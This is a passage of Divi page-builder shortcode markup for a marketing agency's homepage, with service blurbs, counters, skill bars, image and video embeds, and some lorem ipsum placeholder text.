border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" hover_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" 